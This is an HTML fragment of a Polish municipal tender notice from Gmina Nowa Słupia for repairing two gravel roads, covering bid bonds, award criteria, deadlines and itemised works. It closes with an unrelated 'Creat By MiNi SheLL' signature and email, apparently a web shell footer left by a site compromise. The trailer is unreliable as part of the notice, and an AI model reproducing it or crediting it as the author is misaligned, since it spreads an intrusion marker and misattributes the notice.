zobowiązanie podmiotów, o których mowa w art.22a Pzp, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 4.Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia (o ile dotyczy). Pełnomocnictwa, winno być załączone w formie oryginału lub zgodnie z art. 98 ustawy z dnia 14 lutego 1991r. Prawo o notariacie (Dz. U. z 2014 r. poz. 164 ze zm.) dopuszcza się złożenie kopii powyższego dokumentu poświadczonego przez notariusza. 4. Dokumenty, z których wynika umocowanie osób do reprezentowania Wykonawcy, w szczególności: - odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji albo inny dokument potwierdzający uprawnienie do reprezentowania pomiotu przystępującego do postępowania, jeśli z dokumentów rejestrowych to uprawnienie nie wynika; Wymagana forma - oryginał lub kopia poświadczona za zgodność z oryginałem, - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, a umocowanie do złożenia oferty nie wynika z odpisu z ww. dokumentów, należy załączyć pełnomocnictwo określające jego zakres; Wymagana forma - oryginał lub kopia poświadczona przez notariusza.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie: 
Część 1  2 300 PLN  (słownie złotych: dwa tysiące trzysta zł 00/100).
Część 2  2 700 PLN  (słownie złotych: dwa tysiące siedemset złotych zł 00/100).
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dopuszczalne istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy określa § 10 wzoru umowy, stanowiącego załącznik nr 6 do siwz.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/04/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez Wykonawcę firm podwykonawców. 2.W odniesieniu do warunków udziału w postępowaniu Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Remont drogi gminnej Włochy  Hektary (dz. nr 403) od km 0+650 do km 1+162<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 1 Remont drogi gminnej Włochy  Hektary (dz. nr 403) od km 0+650 do km 1+162. 
Przedmiotem inwestycji jest remont drogi gminnej Włochy  Hektary od km 0+650 do km 1+162, Gmina Nowa Słupia. Planowana długość remontowanego odcinka wynosi 512,0 mb, szerokość jezdni 3,0m. Droga w stanie istniejącym ma nawierzchnię z kruszywa. Zakres prac objęty niniejszą inwestycją: roboty pomiarowe, roboty ziemne, wymiana istniejącego przepustu, wzmocnienie podbudowy kruszywem, wykonanie warstwy wiążącej i ścieralnej z betonu asfaltowego, uzupełnienie poboczy kruszywem, uzupełnienie zjazdów kruszywem. Zakres prac obejmuje:
Roboty pomiarowe przy liniowych robotach ziemnych  trasa w terenie równinnym 0,512 km. Rozebranie mechaniczne nawierzchni z mieszanek mineralno  bitumicznych, o grubości 3 cm - 30m2. Usunięcie warstwy ziemi urodzajnej /humusu/ za pomocą spycharek, przy grubości warstwy: do 15 cm  512m2. Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0,25 m3 z transportem urobku samochodami samowyładowczymi o ładowności do 5t, na odległość do 1 km: grunt kat. I-II, (wymiana podbudowy 25 m3, wymiana przepustu 50,0 m3, odtworzenie rowu 28,0 m3) 103 m3. Wywóz ziemi samochodami samowyładowczymi na odległość do 1 km, z załadowaniem i wyładowaniem gruntu kategorii: I-II  179,800 m3. Elementy przepustów rurowych pod zjazdami  ławy fundamentowe żwirowe 2,0 m3. Elementy przepustów rurowych pod zjazdami  ścianki czołowe dla rur o średnicy 60 cm  analogia  ścianki czołowe dla rur o średnicy 80 cm 2 szt. Elementy przepustów rurowych pod zjazdami  rury betonowe o średnicy 60 cm  analogia  przepust z rury PEHD spiralnie karbowanej o średnicy 80 cm  8 m. Naprawa dróg gruntowych wykonywana ręcznie: piaskiem  analogia  zasypka przepustu z piasku 44,0 m3. Formowanie nasypów o wysokości do 3,0 m spycharkami 55kW, z zagęszczeniem nasypu, z ziemi dostarczanej środkami transportu kołowego: grunt kat. I-II 44 m3. Ścieki uliczne z kamienia: narzutowego, na podsypce cementowo  piaskowej 10 m2. Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni  kategoria gruntu: I-IV (512,0m*4,0m)  2048,0 m2. Warstwy odsączające w korycie lub na całej szerokości drogi  zagęszczenie mechaniczne: grubość warstwy po zagęszczeniu 10 cm (120,0 m2+100,0m2) 220,0m2. Warstwy odsączające w korycie lub na całej szerokości drogi  zagęszczenie mechaniczne: za każdy 1 cm grubości ponad 10 cm, krotność 5 (120,0m2+100,0m2) 220m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: 15 cm kruszywo sortowane frakcji 0-63,0mm (512,0m*4,0m) 2048,0m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: ponad 15 cm  dodatek za każdy dalszy 1 cm  krotność 5, kruszywo sortowane frakcji 0-31,5 mm (512,0m*4,0m) 2048 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa wiążąca po zagęszczeniu o grubości: 4 cm, mieszanka AC 16 W (512,0m*3,1m+15,0m2) 1602,2 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: 3 cm mieszanka AC 11 S (512,0m*3,0m+15,0m2) 1551,0m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: ponad 3 cm -  dodatek za każdy dalszy 1 cm  krotność 1, mieszanka AC 11 S (512,0m*3,0+15,0m2) 1 551m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: 7 cm mieszanka sortowana 0-31,5 mm  nawierzchnia zjazdów 30m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: ponad 7 cm  dodatek za każdy dalszy 1 cm  krotność 8, mieszanka sortowana 0-31,5 mm  nawierzchnia zjazdów 30,00 m2. Podbudowy z kruszywa łamanego  warstwa górna o grubości po zagęszczeniu: 8 cm  analogia  pobocza z kruszywa sortowanego 0-31,5 mm  512 m2.   
Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia:
a)	wykonywanie wykopów i nasypów sposobem mechanicznym,
b)	wykonywanie robót związanych z zagęszczaniem warstw konstrukcyjnych pod nawierzchnię drogi i poboczy
c)	wykonywanie robót budowlanych związanych z układaniem przepustów, 
d)	wykonywanie robót związanych z wykonaniem warstwy z betonu asfaltowego,
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45111200-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zgodnie z opisem w SIWZ<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Remont drogi gminnej nr 352059T Baszowice<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 2 Remont drogi gminnej nr 352059T Baszowice od km 0+000 do km 0+360. Przedmiotem inwestycji jest remont drogi gminnej nr 352059 T Baszowice, dz. nr 292/1, 292/2 od km 0+000 do km 0+360, Gmina Nowa Słupia. Planowana długość remontowanego odcinka wynosi 360,00 mb, szerokości jezdni 3,0m. Droga w stanie istniejącym ma nawierzchnię z kruszywa i płyt betonowych. Zakres prac objęty niniejsza inwestycją: roboty pomiarowe, roboty ziemne, wymiana istniejącego przepustu, rozbiórka płyt drogowych, wykonanie warstwy odsączającej z piasku, wzmocnienie podbudowy kruszywem, wykonanie warstwy wiążącej i ścieralnej z betonu asfaltowego, uzupełnienie poboczy kruszywem, uzupełnienie zjazdów kruszywem. Zakres prac obejmuje: Roboty pomiarowe przy liniowych robotach ziemnych  trasa dróg w terenie równinnym 0,36 km. Rozebranie nawierzchni z płyt drogowych betonowych o grubości: 15 cm, z wypełnieniem spoin zaprawą cementową  odzyskanie materiału 848m2. Transport wewnętrzny na odległość do 20 km  prefabrykatów żelbetowych  analogia  transport płyt betonowych na odległość do 1 km  załadunek o rozładunek 311,3 t. Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0,25 m3 z transportem urobku samochodami samowyładowczymi o ładowności do 5 t, na odległość do 1 km:  grunt kat. I-II  (wymiana przepustu 8,0 m3, - odtworzenie rowu 9,0 m3, - wymiana podbudowy 22.0 m3), 39 m3. Wywóz ziemi samochodami samowyładowczymi na odległość do 1 km, z załadowaniem i wyładowaniem gruntu kategorii: I-II 39m3. Elementy przepustów rurowych pod zjazdami  ławy fundamentowe żwirowe 1 m3. Elementy przepustów rurowych pod zjazdami  ścianki czołowe dla rur o średnicy 50 cm 2 szt. Elementy przepustów rurowych pod zjazdami  rury betonowe o średnicy 50 cm  analogia  przepust z rury PEHD spiralnie karbowanej o średnicy 50 cm 7m. Naprawa dróg gruntowych wykonywana ręcznie: piaskiem  analogia  zasypka przepustu z piasku 4 m3. Formowanie nasypów o wysokości do 3,0 m spycharkami 55kW, z zagęszczeniem nasypu, z ziemi dostarczanej środkami transportu kołowego: grunt kat. I-II 4 m3. Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni  kategoria gruntu: I-IV (360m*4m+20m2) 1 460m2. Warstwy odsączające w korycie lub na całej szerokości drogi  zagęszczenie mechaniczne: grubość warstwy po zagęszczeniu 10 cm (148m*1m+212m*4+20m2) 1 016 m2. Warstwy odsączające w korycie lub na całej szerokości drogi po zagęszczenie mechaniczne: za każdy 1 cm grubości ponad 10 cm  krotność 5 (148m*1m)  148 m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: 15 cm kruszywo sortowane frakcji 0-63 mm (360m*4m+20m2) 1460 m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: ponad 15 cm  dodatek za każdy dalszy 1 cm  krotność 5 kruszywo sortowane frakcja 0-31,5 mm (360m*4m+20m2) 1460 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa wiążąca po zagęszczeniu o grubości: 4 cm mieszanka AC 16 W (360m*3,1m+15m2) 1131 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: 3 cm, mieszanka AC 11 S (360m*3m+15m2) 1095m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: ponad 3 cm  dodatek za każdy dalszy 1 cm  krotność 1, mieszanka AC 11 S (360m*3m+15m2) 1095m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: 7 cm  nawierzchnia zjazdów mieszanka sortowana 0-31,5 mm  50 m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: ponad 7 cm  dodatek za każdy dalszy 1 cm  krotność 8, mieszanka sortowana 0-31,5 mm  nawierzchnia zjazdów, 50 m2. Podbudowy z kruszywa łamanego  warstwa górna o grubości po zagęszczeniu 8 cm  analogia  pobocza z kruszywa sortowanego 0-31,5 mm 360 m2. Materiał pochodzący z rozbiórki, nadający się do ponownego wbudowania staje się własnością Zamawiającego (Wykonawca złoży taki materiał w miejscu wskazanym przez Zamawiającego). Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia: a. wykonywanie wykopów i nasypów sposobem mechanicznym, b. wykonywanie robót związanych z zagęszczaniem warstw konstrukcyjnych pod nawierzchnię drogi i poboczy, c. wykonywanie robót budowlanych związanych z układaniem przepustów, d. wykonywanie robót związanych z wykonaniem warstwy z betonu asfaltowego, <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45111200-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zgodnie z opisem SIWZ.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com